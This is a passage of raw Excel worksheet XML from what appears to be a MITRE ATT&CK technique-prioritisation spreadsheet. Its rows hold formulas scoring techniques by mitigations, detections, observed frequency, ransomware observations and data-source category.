        <f t="array" ref="AM90">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD90)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN90" s="37">
        <v>0</v>
      </c>
      <c r="AO90" s="37">
        <v>3</v>
      </c>
      <c r="AP90" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ90" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>243.14282976190475</v>
      </c>
      <c r="AR90" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS90" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT90" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU9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17.438773554421768</v>
      </c>
    </row>
    <row r="91" spans="1:47" ht="51">
      <c r="A91" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B91" s="37">
        <f t="shared" si="1"/>
        <v>141.26182166666666</v>
      </c>
      <c r="C91" s="37" t="s">
        <v>348</v>
      </c>
      <c r="D91" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E91" s="37" t="s">
        <v>3786</v>
      </c>
      <c r="F91" s="37">
        <v>1</v>
      </c>
      <c r="G91" s="37">
        <v>1</v>
      </c>
      <c r="H91" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I91" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J91" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K91" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L91" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M91" s="37">
        <v>0</v>
      </c>
      <c r="N91" s="56">
        <v>3</v>
      </c>
      <c r="O91" s="56">
        <v>8</v>
      </c>
      <c r="P91" s="56">
        <v>0</v>
      </c>
      <c r="Q91" s="56">
        <v>3</v>
      </c>
      <c r="R91" s="57" t="s">
        <v>349</v>
      </c>
      <c r="S91" s="57">
        <v>11</v>
      </c>
      <c r="T91" s="57" t="s">
        <v>350</v>
      </c>
      <c r="U91" s="57">
        <v>14</v>
      </c>
      <c r="V91" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30476166666666665</v>
      </c>
      <c r="W91" s="37">
        <v>25</v>
      </c>
      <c r="X91" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y91" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z91" s="37">
        <v>14</v>
      </c>
      <c r="AA91" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AB91" s="37">
        <v>0.14000000000000001</v>
      </c>
      <c r="AC91" s="37"/>
      <c r="AD91" s="50" t="s">
        <v>347</v>
      </c>
      <c r="AE91" s="37" t="str" cm="1">
        <f t="array" ref="AE91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD91)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF91" s="37">
        <v>87</v>
      </c>
      <c r="AG91" s="37" t="str" cm="1">
        <f t="array" ref="AG91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD91)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH91" s="37">
        <v>87</v>
      </c>
      <c r="AI91" s="37" t="str" cm="1">
        <f t="array" ref="AI91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD91)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ91" s="37">
        <v>87</v>
      </c>
      <c r="AK91" s="37" t="str" cm="1">
        <f t="array" ref="AK91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD91)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL91" s="37">
        <v>87</v>
      </c>
      <c r="AM91" s="37" t="str" cm="1">
        <f t="array" ref="AM91">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD91)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN91" s="37">
        <v>0</v>
      </c>
      <c r="AO91" s="37">
        <v>0</v>
      </c>
      <c r="AP91" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ91" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>47.087273888888888</v>
      </c>
      <c r="AR91" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS91" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT91" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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92" spans="1:47" ht="51">
      <c r="A92" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B92" s="37">
        <f t="shared" si="1"/>
        <v>141.20003361904762</v>
      </c>
      <c r="C92" s="37" t="s">
        <v>351</v>
      </c>
      <c r="D92" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E92" s="37" t="s">
        <v>352</v>
      </c>
      <c r="F92" s="37">
        <v>1</v>
      </c>
      <c r="G92" s="37">
        <v>1</v>
      </c>
      <c r="H92" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I92" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J92" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K92" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L92" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M92" s="37">
        <v>0</v>
      </c>
      <c r="N92" s="56">
        <v>0</v>
      </c>
      <c r="O92" s="56">
        <v>6</v>
      </c>
      <c r="P92" s="56">
        <v>5</v>
      </c>
      <c r="Q92" s="56">
        <v>6</v>
      </c>
      <c r="R92" s="57" t="s">
        <v>353</v>
      </c>
      <c r="S92" s="57">
        <v>14</v>
      </c>
      <c r="T92" s="57" t="s">
        <v>346</v>
      </c>
      <c r="U92" s="57">
        <v>9</v>
      </c>
      <c r="V92" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30000009523809523</v>
      </c>
      <c r="W92" s="37">
        <v>23</v>
      </c>
      <c r="X92" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y92" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z92" s="37">
        <v>17</v>
      </c>
      <c r="AA92" s="37">
        <v>0.17</v>
      </c>
      <c r="AB92" s="37">
        <v>0.17</v>
      </c>
      <c r="AC92" s="37"/>
      <c r="AD92" s="50" t="s">
        <v>347</v>
      </c>
      <c r="AE92" s="37" t="str" cm="1">
        <f t="array" ref="AE92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD92)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF92" s="37">
        <v>88</v>
      </c>
      <c r="AG92" s="37" t="str" cm="1">
        <f t="array" ref="AG92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH92" s="37">
        <v>88</v>
      </c>
      <c r="AI92" s="37" t="str" cm="1">
        <f t="array" ref="AI92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD92)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ92" s="37">
        <v>88</v>
      </c>
      <c r="AK92" s="37" t="str" cm="1">
        <f t="array" ref="AK92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL92" s="37">
        <v>88</v>
      </c>
      <c r="AM92" s="37" t="str" cm="1">
        <f t="array" ref="AM92">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD92)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN92" s="37">
        <v>0</v>
      </c>
      <c r="AO92" s="37">
        <v>0</v>
      </c>
      <c r="AP92" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ92" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>47.06667787301587</v>
      </c>
      <c r="AR92" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS92" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT92" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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93" spans="1:47" ht="34">
      <c r="A93" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B93" s="37">
        <f t="shared" si="1"/>
        <v>83.299915000000013</v>
      </c>
      <c r="C93" s="37" t="s">
        <v>354</v>
      </c>
      <c r="D93" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E93" s="37" t="s">
        <v>355</v>
      </c>
      <c r="F93" s="37">
        <v>1</v>
      </c>
      <c r="G93" s="37">
        <v>1</v>
      </c>
      <c r="H93" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I93" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J93" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K93" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L93" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M93" s="37">
        <v>0</v>
      </c>
      <c r="N93" s="56">
        <v>0</v>
      </c>
      <c r="O93" s="56">
        <v>0</v>
      </c>
      <c r="P93" s="56">
        <v>0</v>
      </c>
      <c r="Q93" s="56">
        <v>0</v>
      </c>
      <c r="R93" s="57" t="s">
        <v>353</v>
      </c>
      <c r="S93" s="57">
        <v>14</v>
      </c>
      <c r="T93" s="57"/>
      <c r="U93" s="57">
        <v>0</v>
      </c>
      <c r="V93" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W93" s="37">
        <v>14</v>
      </c>
      <c r="X93" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y93" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z93" s="37">
        <v>0</v>
      </c>
      <c r="AA93" s="37">
        <v>0</v>
      </c>
      <c r="AB93" s="37">
        <v>0</v>
      </c>
      <c r="AC93" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD93" s="50" t="s">
        <v>356</v>
      </c>
      <c r="AE93" s="37" t="str" cm="1">
        <f t="array" ref="AE93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD93)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF93" s="37">
        <v>89</v>
      </c>
      <c r="AG93" s="37" t="str" cm="1">
        <f t="array" ref="AG93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH93" s="37">
        <v>89</v>
      </c>
      <c r="AI93" s="37" t="str" cm="1">
        <f t="array" ref="AI93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ93" s="37">
        <v>89</v>
      </c>
      <c r="AK93" s="37" t="str" cm="1">
        <f t="array" ref="AK93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL93" s="37">
        <v>89</v>
      </c>
      <c r="AM93" s="37" t="str" cm="1">
        <f t="array" ref="AM93">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD93)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN93" s="37">
        <v>0</v>
      </c>
      <c r="AO93" s="37">
        <v>0</v>
      </c>
      <c r="AP93" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ93" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>27.766638333333336</v>
      </c>
      <c r="AR93" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS93" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT93" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU9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94" spans="1:47" ht="68">
      <c r="A94" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B94" s="37">
        <f t="shared" si="1"/>
        <v>238.9475330952381</v>
      </c>
      <c r="C94" s="37" t="s">
        <v>357</v>
      </c>
      <c r="D94" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E94" s="37" t="s">
        <v>358</v>
      </c>
      <c r="F94" s="37">
        <v>1</v>
      </c>
      <c r="G94" s="37">
        <v>1</v>
      </c>
      <c r="H94" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I94" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J94" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K94" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L94" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M94" s="37">
        <v>0</v>
      </c>
      <c r="N94" s="56">
        <v>6</v>
      </c>
      <c r="O94" s="56">
        <v>38</v>
      </c>
      <c r="P94" s="56">
        <v>9</v>
      </c>
      <c r="Q94" s="56">
        <v>15</v>
      </c>
      <c r="R94" s="57" t="s">
        <v>349</v>
      </c>
      <c r="S94" s="57">
        <v>11</v>
      </c>
      <c r="T94" s="57" t="s">
        <v>350</v>
      </c>
      <c r="U94" s="57">
        <v>14</v>
      </c>
      <c r="V94" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.56190452380952383</v>
      </c>
      <c r="W94" s="37">
        <v>25</v>
      </c>
      <c r="X94" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Y94" s="37">
        <v>0.45454499999999998</v>
      </c>
      <c r="Z94" s="37">
        <v>68</v>
      </c>
      <c r="AA94" s="37">
        <v>0.68</v>
      </c>
      <c r="AB94" s="37">
        <v>0.68</v>
      </c>
      <c r="AC94" s="37"/>
      <c r="AD94" s="50" t="s">
        <v>359</v>
      </c>
      <c r="AE94" s="37" t="str" cm="1">
        <f t="array" ref="AE94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD94)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF94" s="37">
        <v>90</v>
      </c>
      <c r="AG94" s="37" t="str" cm="1">
        <f t="array" ref="AG94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD94)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH94" s="37">
        <v>90</v>
      </c>
      <c r="AI94" s="37" t="str" cm="1">
        <f t="array" ref="AI94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD94)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ94" s="37">
        <v>90</v>
      </c>
      <c r="AK94" s="37" t="str" cm="1">
        <f t="array" ref="AK94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD94)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL94" s="37">
        <v>90</v>
      </c>
      <c r="AM94" s="37" t="str" cm="1">
        <f t="array" ref="AM94">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD94)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN94" s="37">
        <v>0</v>
      </c>
      <c r="AO94" s="37">
        <v>1</v>
      </c>
      <c r="AP94" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ94" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>79.6491776984127</v>
      </c>
      <c r="AR94" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS94" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT94" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU9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1.9202185166288734</v>
      </c>
    </row>
    <row r="95" spans="1:47" ht="51">
      <c r="A95" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B95" s="37">
        <f t="shared" si="1"/>
        <v>100.80954119047618</v>
      </c>
      <c r="C95" s="37" t="s">
        <v>360</v>
      </c>
      <c r="D95" s="50" t="s">
        <v>342</v>
      </c>
      <c r="E95" s="37" t="s">
        <v>361</v>
      </c>
      <c r="F95" s="37">
        <v>1</v>
      </c>
      <c r="G95" s="37">
        <v>1</v>
      </c>
      <c r="H95" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I95" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J95" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K95" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L95" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M95" s="37">
        <v>0</v>
      </c>
      <c r="N95" s="56">
        <v>0</v>
      </c>
      <c r="O95" s="56">
        <v>0</v>
      </c>
      <c r="P95" s="56">
        <v>0</v>
      </c>
      <c r="Q95" s="56">
        <v>3</v>
      </c>
      <c r="R95" s="57" t="s">
        <v>362</v>
      </c>
      <c r="S95" s="57">
        <v>8</v>
      </c>
      <c r="T95" s="57" t="s">
        <v>363</v>
      </c>
      <c r="U95" s="57">
        <v>9</v>
      </c>
      <c r="V95" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.17619052380952382</v>
      </c>
      <c r="W95" s="37">
        <v>17</v>
      </c>
      <c r="X95" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y95" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z95" s="37">
        <v>3</v>
      </c>
      <c r="AA95" s="37">
        <v>0.03</v>
      </c>
      <c r="AB95" s="37">
        <v>0.03</v>
      </c>
      <c r="AC95" s="37"/>
      <c r="AD95" s="50" t="s">
        <v>347</v>
      </c>
      <c r="AE95" s="37" t="str" cm="1">
        <f t="array" ref="AE95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD95)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF95" s="37">
        <v>91</v>
      </c>
      <c r="AG95" s="37" t="str" cm="1">
        <f t="array" ref="AG95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD95)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH95" s="37">
        <v>91</v>
      </c>
      <c r="AI95" s="37" t="str" cm="1">
        <f t="array" ref="AI95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD95)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ95" s="37">
        <v>91</v>
      </c>
      <c r="AK95" s="37" t="str" cm="1">
        <f t="array" ref="AK95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD95)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL95" s="37">
        <v>91</v>
      </c>
      <c r="AM95" s="37" t="str" cm="1">
        <f t="array" ref="AM95">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD95)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN95" s="37">
        <v>0</v>
      </c>
      <c r="AO95" s="37">
        <v>0</v>
      </c>
      <c r="AP95" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ95" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>33.603180396825394</v>
      </c>
      <c r="AR95" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS95" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
